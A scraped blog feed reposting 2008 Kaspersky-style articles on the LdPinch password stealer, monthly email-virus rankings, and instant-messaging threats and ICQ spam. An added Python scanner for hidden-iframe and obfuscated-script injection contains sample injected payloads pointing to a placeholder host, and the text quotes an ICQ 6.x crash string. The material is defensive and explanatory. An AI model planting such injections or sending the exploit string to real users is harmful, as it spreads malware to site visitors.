&lt;br /&gt;&lt;br /&gt;This approach is implemented in Kaspersky Internet Security 7.0.&lt;br /&gt;&lt;br /&gt;Trojan-PSW.Win32.LdPinch: how KIS 7.0 protects against the theft of confidential data&lt;br /&gt;Kaspersky Internet Security 7.0 also features a confidential data protection module that serves as one of the subsystems of its Anti-Spyware component (see Figure 3). It analyzes the behavior of all processes in the user's system and if it detects either of the two types of action described above, it will either warn the user or automatically block the action.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Figure 3. Configuring Kaspersky Internet Security 7.0 Anti-Spyware component&lt;br /&gt;&lt;br /&gt;Let’s examine how this KIS module protects users against attempts to steal confidential data using Trojan-PSW.Win32.LdPinch as an example. This Trojan's main goal is to steal passwords from a range of applications installed on a user's computer.&lt;br /&gt;&lt;br /&gt;As the virus description shows, Trojan-PSW.Win32.LdPinch is designed to steal information about a computer's hard drive and the amount of free space remaining on it, the current user, the computer's network name, the version of the operating system, the processor type, the monitor specifications, the applications installed on the computer, the current running processes and any existing dial-up connections. Most of the information it steals, however, consists of passwords for a wide range of programs, including the following:&lt;br /&gt;&lt;br /&gt;instant messaging clients: &lt;br /&gt;ICQ 99B-2002a &lt;br /&gt;ICQ 2003/Lite/5/Rambler &lt;br /&gt;Miranda IM &lt;br /&gt;TRILLIAN &lt;br /&gt;&amp;RQ, RnQ, The Rat &lt;br /&gt;QIP &lt;br /&gt;GAIM &lt;br /&gt;MSN &amp; Live Messenger&lt;br /&gt;email clients: &lt;br /&gt;The Bat! 
&lt;br /&gt;MS Office Outlook &lt;br /&gt;Mail.Ru Agent &lt;br /&gt;Becky &lt;br /&gt;Eudora &lt;br /&gt;Mozilla Thunderbird &lt;br /&gt;Gmail Notifier&lt;br /&gt;Internet browsers: &lt;br /&gt;Opera &lt;br /&gt;Protected Storage(IE,Outlook Express) &lt;br /&gt;Mozilla Browser &lt;br /&gt;Mozilla Firefox&lt;br /&gt;automatic dialers: &lt;br /&gt;RAS &lt;br /&gt;E-DIALER &lt;br /&gt;VDialer&lt;br /&gt;file managers: &lt;br /&gt;FAR &lt;br /&gt;Windows/Total Commander&lt;br /&gt;FTP clients: &lt;br /&gt;CuteFTP &lt;br /&gt;WS FTP &lt;br /&gt;FileZilla &lt;br /&gt;Flash FXP &lt;br /&gt;Smart FTP &lt;br /&gt;Coffee Cup FTP&lt;br /&gt;and many others.&lt;br /&gt;&lt;br /&gt;Stolen passwords are used to further spread malicious programs. Once a password for an ICQ client is obtained, for example, the Trojan will modify this password on the ICQ website and begin sending messages with a link to its own executable file from the victim’s account in an attempt to infect as many machines as possible.&lt;br /&gt;&lt;br /&gt;All stolen data is encrypted and sent either to a specific email address or placed on the malicious user's FTP server.&lt;br /&gt;&lt;br /&gt;Confidential data protection systems which analyze traffic (such as Norton Privacy Control) cannot prevent encrypted data from being sent, even if the user enters all of his passwords to all of his programs in a list of monitored data. That means that if a user has installed a Symantec program with Privacy Control or another product that uses the same approach to protect confidential information, his computer may be attacked by a new version of Trojan-PSW.Win32.LdPinch that is not included in the antivirus database and is not recognized by any of the other security components. 
As a result, most of that user’s passwords will be stolen and then used by cyber criminals at their discretion.&lt;br /&gt;&lt;br /&gt;However, a protection system which analyzes application activity blocks both the harvesting (see Figure 4) and stealthed transmission (see Figure 5) of confidential data by Trojan-PSW.Win32.LdPinch.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Figure 4. Kaspersky Internet Security 7.0 warns of Trojan-PSW.Win32.LdPinch&lt;br /&gt;attempt to gain access to confidential data&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Figure 5. Kaspersky Internet Security 7.0 warns of Trojan-PSW.Win32.LdPinch&lt;br /&gt;attempt to secretly transmit confidential data&lt;br /&gt;&lt;br /&gt;Conclusion&lt;br /&gt;This article covers the classification of methods used by malicious users to steal information via computer, and analyzes two fundamentally different techniques in developing modules which protect confidential data. Such modules are implemented in contemporary security solutions. The article also analyzes the effectiveness of both approaches, using a widely known Trojan as an example.&lt;br /&gt;&lt;br /&gt;A comparison of both techniques shows that the technique based on analyzing application activity that could indicate an attempt to steal confidential data has major advantages. 
The approach using a list created by the user for his eyes only has been shown to be less effective, as it is more difficult to ensure that no part of that list is ever transmitted from the user's computer.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2383994250717691599-8991947875030838670?l=virusopedia.blogspot.com'/&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://virusopedia.blogspot.com/feeds/8991947875030838670/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='https://www.blogger.com/comment.g?blogID=2383994250717691599&amp;postID=8991947875030838670' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2383994250717691599/posts/default/8991947875030838670'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2383994250717691599/posts/default/8991947875030838670'/><link rel='alternate' type='text/html' href='http://virusopedia.blogspot.com/2008/06/bot-nets-and-future-virtual-virus.html' title='Bot Nets and Future Virtual Virus Enterprise'/><author><name>PROF. 
SJAFW</name><uri>http://www.blogger.com/profile/00700919093101522027</uri><email>noreply@blogger.com</email><gd:extendedProperty xmlns:gd='http://schemas.google.com/g/2005' name='OpenSocialUserId' value='18053836773761000586'/></author><thr:total xmlns:thr='http://purl.org/syndication/thread/1.0'>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2383994250717691599.post-4249456899348286016</id><published>2008-06-07T09:15:00.000-07:00</published><updated>2008-06-07T09:24:35.847-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='symantec'/><category scheme='http://www.blogger.com/atom/ns#' term='virus'/><category scheme='http://www.blogger.com/atom/ns#' term='renown'/><category scheme='http://www.blogger.com/atom/ns#' term='analysis'/><category scheme='http://www.blogger.com/atom/ns#' term='adope'/><category scheme='http://www.blogger.com/atom/ns#' term='antonio'/><category scheme='http://www.blogger.com/atom/ns#' term='world'/><category scheme='http://www.blogger.com/atom/ns#' term='kaspersky'/><category scheme='http://www.blogger.com/atom/ns#' term='jithendra'/><category scheme='http://www.blogger.com/atom/ns#' term='internet'/><category scheme='http://www.blogger.com/atom/ns#' term='history'/><category scheme='http://www.blogger.com/atom/ns#' term='adobe'/><title type='text'>Computer Viruses and There Analysis</title><content type='html'>Top 20 Viruses for May 20th 2008&lt;br /&gt;&lt;br /&gt;Position Change in position Name Proactive Detection Flag Percentage &lt;br /&gt;1.   0  Email-Worm.Win32.NetSky.q  Trojan.generic 23.12  &lt;br /&gt;2.   +1  Email-Worm.Win32.NetSky.y  Trojan.generic 9.70  &lt;br /&gt;3.   +2  Email-Worm.Win32.Scano.gen  Trojan.generic 9.63  &lt;br /&gt;4.   +4  Email-Worm.Win32.Nyxem.e  Trojan.generic 6.75  &lt;br /&gt;5.   -3  Email-Worm.Win32.NetSky.d  Trojan.generic 6.27  &lt;br /&gt;6.   Return  Email-Worm.Win32.NetSky.x  Trojan.generic 4.44  &lt;br /&gt;7.   
-1  Email-Worm.Win32.NetSky.aa  Trojan.generic 3.74  &lt;br /&gt;8.   Return  Email-Worm.Win32.NetSky.b  Trojan.generic 3.26  &lt;br /&gt;9.   -5  Email-Worm.Win32.Bagle.gt  Trojan.generic 2.75  &lt;br /&gt;10.   Return  Net-Worm.Win32.Mytob.u  Worm.P2P.generic 2.60  &lt;br /&gt;11.   +6  Net-Worm.Win32.Mytob.c  Trojan.generic 2.40  &lt;br /&gt;12.   0  Email-Worm.Win32.Scano.bn  Trojan.generic 2.09  &lt;br /&gt;13.   Return  Email-Worm.Win32.NetSky.r  Trojan.generic 1.98  &lt;br /&gt;14.   +4  Email-Worm.Win32.NetSky.t  Trojan.generic 1.94  &lt;br /&gt;15.   Return  Net-Worm.Win32.Mytob.bi  Trojan.generic 1.65  &lt;br /&gt;16.   -5  Email-Worm.Win32.Bagle.gen  Trojan.generic 1.39  &lt;br /&gt;17.   -4  Email-Worm.Win32.Mydoom.l  Worm.P2P.generic 1.19  &lt;br /&gt;18.   Return  Net-Worm.Win32.Mytob.t  Worm.P2P.generic 1.08  &lt;br /&gt;19.   -3  Email-Worm.Win32.NetSky.c  Trojan.generic 0.97  &lt;br /&gt;20.   New!  Net-Worm.Win32.Mytob.cg  Worm.P2P.generic 0.90  &lt;br /&gt;Other malicious programs  12.15  &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;The May 2008 Email Top Twenty is a short one; this is explained by the well-known fact that virus writers take a break over the summer months. The complete absence of any epidemics in mail traffic, which is obvious from even a cursory glance at this month's rankings, bears this out.&lt;br /&gt;&lt;br /&gt;In fact, the only significant change to the rankings was caused by the re-entry of a few worms which have been in circulation for several years now.&lt;br /&gt;&lt;br /&gt;Trojan-Downloader programs such as Agent.ica, Agent.hsl, and Diehard that were active during the first four months of 2008 disappeared without trace in May.&lt;br /&gt;&lt;br /&gt;The Warezov and Zhelatin worms have not reappeared since dropping out of the Top Twenty back in February. 
The authors have stopped sending out the executable components of the worms by email, confining themselves to distributing the code via links on infected websites.&lt;br /&gt;&lt;br /&gt;This does mean that the threat posed by malicious code in email has declined. However, phishing and spam continue to pose very real threats and have the potential to create just as big a problem for the end user.&lt;br /&gt;&lt;br /&gt;Other malicious programs made up a significant percentage (12.15%) of all malicious code found in mail traffic.&lt;br /&gt;&lt;br /&gt;The Top Twenty countries which acted as sources of infected emails in May are shown below:&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Position Change Country Percentage &lt;br /&gt;1   0  USA  21.72  &lt;br /&gt;2   +5  Poland  13.18  &lt;br /&gt;3   -1  South Korea  7.88  &lt;br /&gt;4   -1  Spain  5.85  &lt;br /&gt;5   -1  China  5.15  &lt;br /&gt;6   0  France  4.07  &lt;br /&gt;7   +1  Germany  3.54  &lt;br /&gt;8   -1  Brazil  3.49  &lt;br /&gt;9   0  United Kingdom  2.83  &lt;br /&gt;10   -2  India  2.82  &lt;br /&gt;11   -1  Italy  2.66  &lt;br /&gt;12   -1  Israel  1.80  &lt;br /&gt;13   0  Japan  1.66  &lt;br /&gt;14   +5  Canada  1.15  &lt;br /&gt;15   +2  The Netherlands  1.07  &lt;br /&gt;16   -1  Turkey  1.05  &lt;br /&gt;17   -1  Australia  1.03  &lt;br /&gt;18   -4  Argentina  1.02  &lt;br /&gt;19   +1  Russia  0.99  &lt;br /&gt;20   New!  Austria  0.91  &lt;br /&gt;Other Countries  16.13  &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Summary&lt;br /&gt;Moved up: Email-Worm.Win32.NetSky.y, Email-Worm.Win32.Scano.gen, Email-Worm.Win32.Nyxem.e, Net-Worm.Win32.Mytob.c, Email-Worm.Win32.NetSky.t. &lt;br /&gt;Moved down: Email-Worm.Win32.NetSky.d, Email-Worm.Win32.NetSky.aa, Email-Worm.Win32.Bagle.gt, Email-Worm.Win32.Bagle.gen, Email-Worm.Win32.Mydoom.l, Email-Worm.Win32.NetSky.c. 
&lt;br /&gt;Returned: Email-Worm.Win32.NetSky.x, Email-Worm.Win32.NetSky.b, Net-Worm.Win32.Mytob.u, Email-Worm.Win32.NetSky.r, Net-Worm.Win32.Mytob.bi, Net-Worm.Win32.Mytob.t, Net-Worm.Win32.Mytob.cg. &lt;br /&gt;No change: Email-Worm.Win32.NetSky.q, Email-Worm.Win32.Scano.bn. &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Instant threats&lt;br /&gt;&lt;br /&gt;IM clients&lt;br /&gt;For many people, communicating online has become an integral part of daily life. The multitude of options for communicating with others – email, chat, forums, blogs, etc. — all occupy their own specific place on the Internet. Instant messengers (IM), which allow users to talk to others anywhere in the world in real time, are one of the popular alternatives. &lt;br /&gt;&lt;br /&gt;In order to use IM, a user needs an Internet connection and a client application installed on their PC. There are lots of IM applications and almost all support the same basic functions, allowing a user to search for other users with similar interests, access personal profiles, choose a status mode, etc. A number of IM clients (or Internet pagers, as they are sometimes called) offer additional features. &lt;br /&gt;&lt;br /&gt;The most popular IM client in Russia is undoubtedly ICQ – a playful abbreviation of the phrase “I seek you”. Every ICQ user has a unique number, or UIN (Unified Identification Number) that s/he uses to log on. Each UIN is protected by a password set by the user. Messages are sent via the TCP/IP transport protocol using a format specially created by the developer Mirabilis. As a rule, a single message consists of one TCP packet. Some other clients also make use of modified versions of this protocol to send messages, e.g. QIP (Quiet Internet Pager) and Miranda. &lt;br /&gt;&lt;br /&gt;Microsoft’s MSN Messenger (or Windows Live Messenger) is another IM client popular with users in the West. 
MSN Messenger uses the Microsoft Notification Protocol (MSNP, also known as the Mobile Status Notification Protocol). The MSNP2 protocol specification is publicly available; later versions are not. The latest version of MSN Messenger uses MSNP14.&lt;br /&gt;&lt;br /&gt;QQ, an IM application similar to ICQ, is very popular in China. &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Figure 1. The Chinese IM client QQ &lt;br /&gt;&lt;br /&gt;As well as standard IM functions, Skype also offers voice chat. This client, which is popular around the world, allows users to exchange voice messages for free. To do this, the user needs a headset and a computer with the application and an Internet connection. Skype can also be used to call any telephone number, although this is not a free service. &lt;br /&gt;&lt;br /&gt;IM threats&lt;br /&gt;Unfortunately, the virtual world is open to abuse and instant messaging applications are not immune. IM is often the target of the following malicious activities: &lt;br /&gt;&lt;br /&gt;Stealing passwords to IM accounts using brute force attacks or social engineering. &lt;br /&gt;Spreading malware (this can be done in two ways): &lt;br /&gt;Messages are sent which contain links; if the user clicks on the link, a malicious program file is downloaded to the user’s PC. Social engineering is used to tempt the user to open the file and by doing so, launch the malicious program. &lt;br /&gt;Messages are sent which contain links to infected websites. &lt;br /&gt;Spam. &lt;br /&gt;All IM applications are vulnerable to some type of threat. Take, for instance, the popular Chinese IM client QQ. Trojan-PSW.Win32.QQPass, and a related program, Worm.Win32.QQPass, are both widespread in China and were specially created to steal QQ client passwords. 
Worm.Win32.QQPass propagates by copying itself to removable media along with an autorun.inf file (this ensures the worm will be launched on an uninfected computer as long as the Autorun function is enabled).&lt;br /&gt;&lt;br /&gt;Skype has also not escaped the attention of virus writers. Worm.Win32.Skipi spreads via Skype by sending a link to its executable file to all Skype contacts on the victim machine. The worm also spreads by copying itself to removable media together with a file called "autorun.inf". In addition to this, it prevents antivirus solutions and Windows from being updated by editing the hosts file, and also attempts to terminate processes associated with security applications. And of course, the picture wouldn't be complete without a Trojan: Trojan-PSW.Win32.Skyper is designed to steal Skype account passwords. &lt;br /&gt;&lt;br /&gt;Microsoft’s MSN Messenger is actively used to spread IRC bots. Many of them are capable of propagating via the messaging client when they receive a command from a remote user via a backdoor. For instance, if a cybercriminal has a small botnet s/he wants to extend, s/he sends a command to backdoors on the infected machines. The command instructs the machines to send a message with a link such as http://www.***.com/www.funnypics.com to all MSN Messenger contacts on those machines. After that, everything depends on the person that receives the message. If he decides to look at the “funny pics”, that means another computer will be added to the zombie network – by clicking on the link the user downloads a backdoor to his/her machine.&lt;br /&gt;&lt;br /&gt;Malicious users exploit MSN Messenger because it is included in the Windows installation package. This means all Windows users automatically have the MSN client on their machines. 
The popularity of MSN around the world makes it all the more attractive to cybercriminals wanting to increase the number of infected computers in their botnets.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Figure 2. Part of Backdoor.Win32.SdBot.clg. &lt;br /&gt;The underlined sections show the commands used to spread the Trojan &lt;br /&gt;&lt;br /&gt;ICQ threats&lt;br /&gt;This section provides an overview of the most common attack methods used to target IM clients, using ICQ as an example. &lt;br /&gt;&lt;br /&gt;Password theft&lt;br /&gt;As mentioned above, all ICQ users have a Unified Identification Number, or UIN. At the moment, nine-digit numbers are the most common. However, many users are keen to have a UIN that is identical to their mobile phone number, a numerical palindrome, or in which all the digits are the same. Such UINs are easy to remember and, for some, a matter of prestige. ICQ numbers with five, six or seven digits, which may contain only two different numbers, are seen as being particularly valuable. &lt;br /&gt;&lt;br /&gt;‘Attractive’ UINs are traded, often fetching high prices. Many sites even have a number ordering service that promises to “obtain” the number wanted by the customer. Moreover, batches of unremarkable nine-digit numbers are offered to those interested in sending mass mailings. Using multiple numbers to distribute spam makes it possible to evade the anti-spam blacklists used by irritated users to ignore specific numbers. &lt;br /&gt;&lt;br /&gt;The vendors of such ‘prestigious’ numbers rarely mention how the numbers are obtained. E-commerce sites contain assurances that the UINs are being sold legally. In most cases, however, the vendor has acquired the ICQ numbers by illegal means.&lt;br /&gt;&lt;br /&gt;A number of methods are used to steal UINs. The multitude of Internet stores selling attractive UINs often engage in industrial-scale password searches and account theft. 
Another method is to steal the password to the ICQ user’s primary email and then use it to change the original UIN password without the user’s knowledge. Here's a more detailed overview of how this works.&lt;br /&gt;&lt;br /&gt;ICQ technical support offers a service for users that have forgotten their UIN passwords. The process of restoring a password has been modified several times and has become more sophisticated. It now acts as a fairly reliable safeguard against password theft. Users are required to answer a question that they themselves set. If they have forgotten the answer, then the question can be changed using their primary email – the email address entered in the contact information during registration. The process is reasonably secure, but if a third party has somehow gained access to the primary email, the UIN is there for the taking. After obtaining the password to the primary email it is possible for a malicious user to contact ICQ pretending to be an account holder who has forgotten his or her UIN password. The malicious user can then prevent the original owner from accessing not only his or her ICQ account but also the primary email simply by changing the old password. Theft of this kind is not easy: obtaining the password to the email account linked to an ICQ number generally means brute-forcing it, which requires a very powerful computer or even a network of them. &lt;br /&gt;&lt;br /&gt;However, the most popular method for stealing ICQ numbers is by using malicious programs, and Trojan-PSW.Win32.LdPinch in particular. This family of Trojans has come to pose a serious threat to users over the last few years. LdPinch not only steals passwords to ICQ and other IM clients such as Miranda but also to email accounts, various FTP programs, online games etc. There are dedicated constructor programs designed to create specific types of malicious Trojans. Such programs make it possible to set parameters defining which user passwords the malware will steal once installed on the victim machine. 
Once the program has been configured, the malicious user only has to provide an email address where confidential information will be sent. The ease with which these malicious programs can be created means they are prevalent not only in mail traffic but also in IM traffic. &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Figure 3. Constructor used to create Trojan-PSW.Win32.LdPinch&lt;br /&gt;&lt;br /&gt;Spreading malicious programs&lt;br /&gt;Mail traffic contains a range of malware families which either spread themselves, or are sent via spam. ICQ, however, is generally used to spread three types of malicious program: &lt;br /&gt;&lt;br /&gt;IM worms – these malicious programs use the IM client to self-propagate. &lt;br /&gt;Trojans designed to steal passwords, including passwords for ICQ numbers (in the vast majority of cases, it is Trojan-PSW.Win32.LdPinch). &lt;br /&gt;Malicious programs classified by Kaspersky Lab as Hoax.Win32.*.* (malware created to fraudulently obtain money from users). &lt;br /&gt;How exactly is ICQ used to spread malware? &lt;br /&gt;&lt;br /&gt;IM worms require little or no user interaction to spread. When run, many IM worms send themselves to the IM contacts on the victim machine. These worms have a range of functions: they can steal passwords, create botnets and, sometimes the payload is purely destructive (e.g. deleting all .mp3 files from the victim machine). Malicious programs such as Email-Worm.Win32.Warezov and Email-Worm.Win32.Zhelatin (Storm Worm) have used ICQ to actively spread.&lt;br /&gt;&lt;br /&gt;However, in most cases user action is required to ensure that an attack will be successful. A wide variety of social engineering ploys can be used to make a potential victim click on a link, and open a file if one is downloaded from the link. &lt;br /&gt;&lt;br /&gt;Here's an example of an attack designed to download malware to the victim’s machine. 
First of all, the malicious user creates several user accounts with seductive profile information (e.g. “pretty girl, 22, looking for a man”). Bots (small programs with primitive intelligence that can support a basic conversation) are then linked to that profile number. The first thing users usually want to see is a photograph of the “pretty girl”; the bot responds to such requests by sending a link. Needless to say, the link doesn't lead to a photo, but to a malicious program. &lt;br /&gt;&lt;br /&gt;A variation on the above is when a link to a malicious program is inserted in the personal details of the “girl”. This type of attack requires more effort than the previous method. For example, at least a few of the main personal information fields have to be filled in and potential victims have to be selected. Then a conversation has to be struck up to ensure that users are tempted to click on the link to “nice photos from the Pacific coast” in the “girl’s” personal details. &lt;br /&gt;&lt;br /&gt;Social engineering ploys are also used when spreading malicious programs with the help of ICQ spam. More precisely, it's not the malware itself that is spread – users are sent links to malicious programs.&lt;br /&gt;&lt;br /&gt;Links in spam can also lead to sites (legitimate ones that have been hacked, or ones which have been specially created) which contain Trojan-Downloader programs. These downloaders then install other malicious software on the victim computer. A more detailed description of such attacks is given below.&lt;br /&gt;&lt;br /&gt;Browser vulnerabilities (in particular, those in Internet Explorer) are frequently exploited to download malware with the help of malicious code already placed on a website. First of all, a popular legitimate site will be attacked, and code (e.g., iframe or encrypted JavaScript) placed on its pages. This code will in turn download a malicious program to the computers of those who visit the site. 
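&lt;br /&gt;&lt;br /&gt;The following is an added example, not code from the original article or from Kaspersky Lab: a small scanner that walks a page's HTML looking for the two injection patterns just described, an iframe sized or styled to be invisible, and a script that rebuilds its payload from long runs of escape sequences with unescape, document.write or eval. It uses only the Python standard library and runs on a constructed page whose host names (bad.example) are placeholders. The same check applies to pages altered through a stolen FTP password, as described later in this article, which is why each finding also records whether the injection sits after the closing html tag, the usual sign of something appended to every page in bulk.&lt;br /&gt;&lt;br /&gt;

```python
import re
from html.parser import HTMLParser

def angle(s):
    """Swap [ ] for real angle brackets so the sample markup can be written
    inline as a plain string (the sample itself contains no square brackets)."""
    return s.replace("[", chr(60)).replace("]", chr(62))

# Constructed page with placeholder host names: a normal-looking site with two
# injected payloads appended after the closing html tag, which is how an
# attacker holding the FTP password typically alters every page at once.
SAMPLE_PAGE = angle("""[html][head][title]Example shop[/title]
[script src="/js/menu.js"][/script][/head]
[body][h1]Welcome[/h1][p]Our catalogue...[/p]
[iframe src="/ads/banner.html" width="300" height="250"][/iframe]
[/body][/html]
[iframe src="http://bad.example/in.cgi?3" width="0" height="0" style="visibility:hidden"][/iframe]
[script]document.write(unescape("%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%62%61%64%2E%65%78%61%6D%70%6C%65%2F%6C%2E%70%68%70%22%3E"));[/script]
""")

# Eight or more consecutive %XX / \xXX escapes: a payload being rebuilt at run time.
ESCAPE_RUN = re.compile(r"(?:%[0-9A-Fa-f]{2}|\\x[0-9A-Fa-f]{2}){8,}")
DECODER_CALLS = re.compile(r"\b(eval|unescape|String\.fromCharCode|document\.write)\s*\(")

class InjectionScanner(HTMLParser):
    """Collects (kind, detail, after_html_close) findings while parsing."""

    def __init__(self):
        super().__init__()
        self.findings = []
        self._in_script = False
        self._script_text = []
        self._after_html_close = False

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "iframe":
            style = (a.get("style") or "").replace(" ", "").lower()
            tiny = a.get("width") in ("0", "1") or a.get("height") in ("0", "1")
            hidden = "display:none" in style or "visibility:hidden" in style
            if tiny or hidden:
                self.findings.append(("hidden-iframe", a.get("src", ""), self._after_html_close))
        elif tag == "script":
            self._in_script = True
            self._script_text = []

    def handle_data(self, data):
        if self._in_script:
            self._script_text.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._in_script:
            self._in_script = False
            body = "".join(self._script_text)
            calls = {m.group(1) for m in DECODER_CALLS.finditer(body)}
            if calls and ESCAPE_RUN.search(body):
                self.findings.append(("obfuscated-script", ",".join(sorted(calls)), self._after_html_close))
        elif tag == "html":
            self._after_html_close = True

def scan_page(html_text):
    """Return the list of injection findings for one page."""
    scanner = InjectionScanner()
    scanner.feed(html_text)
    scanner.close()
    return scanner.findings

if __name__ == "__main__":
    for finding in scan_page(SAMPLE_PAGE):
        print(finding)
```

Run it over every page of a site after a suspected compromise; findings flagged as sitting after the closing html tag are the typical signature of bulk appending through FTP. A hit still needs manual confirmation, since advertising networks also use tiny iframes and packed scripts.&lt;br /&gt;&lt;br /&gt;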
Another technique is to create a simple site on cheap or free web hosting – a site which contains similar downloader code. The site is then advertised by mass mailing over IM. If a user clicks on a link to the site, malicious software will be secretly downloaded to the victim machine. The user may not even suspect that the site s/he visited was attacked or was a fake. Meanwhile, LdPinch or IRCBot will be busily running on the infected computer. &lt;br /&gt;&lt;br /&gt;The vulnerabilities used in carrying out such attacks can be present in the instant messaging applications themselves. In many cases the vulnerability can lead to a buffer overflow and the execution of arbitrary code on a system, or provide remote access to a computer without the user's knowledge or consent.&lt;br /&gt;&lt;br /&gt;If the malicious code that is run on a system after a buffer overflow is able to self-propagate, then by using the same application vulnerability on other machines the program can penetrate the computers of a significant number of users, causing an epidemic. Exploiting vulnerabilities requires a high degree of technical skill, and this limits, to some extent, the options open to cybercriminals. &lt;br /&gt;&lt;br /&gt;ICQ spam has recently been used to spread fake programs that supposedly generate pin codes for cards used to pay for various mobile phone services. Kaspersky Lab detects these programs as not-virus.Hoax.Win32.GSMgen. In actual fact, such software generates unlimited quantities of randomly generated numbers that are supposed to be pin codes for cards used to top up telephone accounts. The results generated by the program are encrypted and in order to decipher them a key has to be obtained from the author, which, of course, comes at a price. The sum is usually small – about $10-$15 – which makes the offer even more attractive. 
The reasoning goes something like this: “I pay $15 once and then I can use my mobile phone for the rest of my life for free!” The fact that the number received in return for payment does not top up an account makes this an everyday case of fraud. (It should be noted that if the program did indeed generate pin codes to pay for mobile services, the price would be significantly higher, and the authors would keep a much lower profile so as not to attract the attention of mobile operators and law enforcement agencies.)&lt;br /&gt;&lt;br /&gt;ICQ spam&lt;br /&gt;Unlike email spam, ICQ spam has not been researched in depth. Below are the results of a small study conducted from February 23 to March 23, 2008. The research involved categorizing the subjects of unwanted messages sent to ICQ users and performing a comparative analysis of ICQ spam vs. email spam. &lt;br /&gt;&lt;br /&gt;Popular subjects in ICQ spam&lt;br /&gt;&lt;br /&gt;The subjects in ICQ spam messages are quite varied and can include advertisements for a new website or game server, requests to vote for somebody in a contest, offers to buy expensive mobile phones at reduced prices or messages that include URLs that lead to malicious programs. A spam link can lead to a website with an exploit that uses vulnerabilities in Internet Explorer or other popular browsers (messages with malicious links were not classified as a separate category for the purposes of this study).&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Figure 4. Distribution of ICQ spam by subject&lt;br /&gt;&lt;br /&gt;Advertising of Entertainment Sites (18.47%) came top of the rankings. In all probability, this category will continue to lead the ICQ spam statistics. The main reason for its popularity is the effectiveness of this type of spam. Take a typical situation when someone who has been working on a computer for a long period receives an ICQ message about a new website with lots of funny images/stories/videos etc. 
It is very likely that the tired user will follow the link in the message as a diversion from work. &lt;br /&gt;&lt;br /&gt;The Adult Spam category in second place (17.19%) circulates messages similar to those in email spam that advertise dating sites, porn resources, individual pages which contain erotic material etc.&lt;br /&gt;&lt;br /&gt;The Online Income category (15.83%) includes messages that promise money in return for clicking on banners, visiting certain websites and looking at advertising. It also includes network (or multilevel) marketing offers.&lt;br /&gt;&lt;br /&gt;The Other Spam category (12.77%) consists of messages on different subjects, each of which accounts for a relatively low percentage of spam traffic, making it impossible to classify them in individual categories. Some of the message authors in this category have very vivid imaginations. They send a variety of chain letters, toothpaste ads, predictions by archbishops of a fascist dictatorship in Russia, etc. Among the goods advertised, DVDs and car parts are predominant. ICQ phishing messages, which will be discussed later in this article, also fall into this category. &lt;br /&gt;&lt;br /&gt;Messages related to ICQ in some way were included in the category in fifth position of our ranking (8.17%). One interesting phenomenon is “ICQ chain letters”, most of which contain the following text (translated from Russian): &lt;br /&gt;&lt;br /&gt;“WARNING !!! Starting 1.12, ICQ will become a paid&lt;br /&gt;service. You can prevent this, send this message to &lt;br /&gt;20 people from your contact list. This is not a &lt;br /&gt;joke (source www.icq.com) If you send it 20 &lt;br /&gt;times you will receive an email and your flower &lt;br /&gt;will become blue. I.e. you will be among those &lt;br /&gt;who are against. If voting wins, ICQ will &lt;br /&gt;remain free.” &lt;br /&gt;The only things that change are the date and the number of people to whom the message is supposed to be sent. 
Interestingly, some messages contain multi-level quoting, indicating that many users really believe someday their “flower will become blue” and ICQ will remain free forever. &lt;br /&gt;&lt;br /&gt;Messages in different languages that urge users to upgrade to the new, sixth version of the ICQ client are also sent on a regular basis. At first, it was unclear why these messages were so popular among spammers. There was unconfirmed information that ICQ 6.x includes a vulnerability that leads to errors when processing messages formed in a certain way. On February 28, 2008 this was confirmed: according to http://bugtraq.ru, “…sending a specially formed … message (in the simplest case, "%020000000s") to a user with ICQ 6.x installed results in an error when generating HTML code to display messages in the embedded Internet Explorer component. This error may lead to the execution of arbitrary code on the remote system.” This vulnerability is not present in the latest build of the ICQ client. &lt;br /&gt;&lt;br /&gt;Messages in the Computer Games category (5.79%) can be divided into two large groups. Messages in the first group advertise various browser-based online games, those in the other – game servers, mostly for Lineage II and Counter-Strike.&lt;br /&gt;&lt;br /&gt;Offers of Illegal Services (5.45%) are only one third of a percentage point behind computer game ads. These offer users the chance to get the password to a specific mailbox, organize a DoS attack, make counterfeit documents (both Russian and non-Russian), and learn how to hack credit cards or obtain the information necessary to do so – all for a price. &lt;br /&gt;&lt;br /&gt;Eighth position (5.28%) went to the category containing messages that ask users to vote for specific participants in a range of Internet contests. &lt;br /&gt;&lt;br /&gt;Job and joint business offers came ninth (4.17%) and offers of computer services, including hosting, tenth (3.22%). 
&lt;br /&gt;&lt;br /&gt;The Mobile Spam message group at the end of the rankings (2.72%) also consists of two types of messages. The first type includes messages that advertise websites selling mobile phones. The prices of popular models on such sites are often significantly lower than market prices, raising suspicions as to the origin and legality of such telephones. The second type is messages that advertise sites with a variety of mobile content. &lt;br /&gt;&lt;br /&gt;During the period from February 23 to March 23, 2008, no more than 1% of messages in ICQ spam were found to be advertising medications or health related services. &lt;br /&gt;&lt;br /&gt;Phishing messages are also occasionally sent to ICQ users. These messages were not categorized as an individual group because they are relatively rare. Cybercriminals use social engineering methods when attempting to obtain passwords to users’ UINs. The success or failure of such attacks largely depends on how well informed a user is. If there are genuine problems, as a rule the official ICQ support service will inform users of the problems, but it will never ask them to send their passwords by email or enter it in a web form on a website. &lt;br /&gt;&lt;br /&gt;&lt;br 